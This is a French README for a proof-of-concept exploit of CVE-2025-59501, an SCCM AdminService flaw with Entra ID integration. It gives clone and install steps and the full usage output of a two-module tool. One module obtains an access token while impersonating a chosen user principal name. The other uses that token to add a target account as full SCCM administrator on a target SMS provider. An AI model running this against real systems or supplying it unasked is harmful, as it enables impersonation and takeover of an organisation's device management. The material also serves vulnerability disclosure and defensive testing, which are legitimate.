
CVE-2025-59501 code POC
POC qui abuse de l'API AdminService de SCCM lorsque l'intégration Entra ID est activée pour s'élever au rang d'Administrateur complet et prendre le contrôle d'une hiérarchie SCCM. Plus de détails dans cet article de blog
git clone https://github.com/garrettfoster13/CVE-2025-59501.git
cd CVE-2025-59501/
uv sync
L'outil comporte deux modules : token et admin
➜ CVE-2025-59501 git:(main) ✗ uv run poc.py
usage: poc.py [-h] {token,admin} ...
POC to abuse CVE-2025-59501 by @unsigned_sh0rt
positional arguments:
{token,admin}
token Get AdminService access token
admin Add user as SCCM admin
options:
-h, --help show this help message and exit
Le module token permet de demander un jeton d'accès en tant qu'utilisateur Entra/AD avec un UPN que vous souhaitez usurper
➜ CVE-2025-59501 git:(main) ✗ uv run poc.py token -h
usage: poc.py token [-h] -u USERNAME [-p PASSWORD] -c CLIENT_ID -t TENANT_ID [-s SCOPE]
options:
-h, --help show this help message and exit
-u, --username USERNAME
username
-p, --password PASSWORD
password
-c, --client-id CLIENT_ID
azure app clientid
-t, --tenant-id TENANT_ID
entra tenant ID
-s, --scope SCOPE resource URI/Scope
Le module admin utilise le jeton pour s'authentifier auprès de l'API AdminService et ajouter un compte utilisateur cible en tant qu'administrateur SCCM
➜ CVE-2025-59501 git:(main) ✗ uv run poc.py admin -h
usage: poc.py admin [-h] -t TARGET -u USER -s SID -a ACCESS_TOKEN
options:
-h, --help show this help message and exit
-t, --target TARGET target SMS provider FQDN or IP address
-u, --user USER Username to add as admin
-s, --sid SID New admins user's SID
-a, --access-token ACCESS_TOKEN
AdminService access token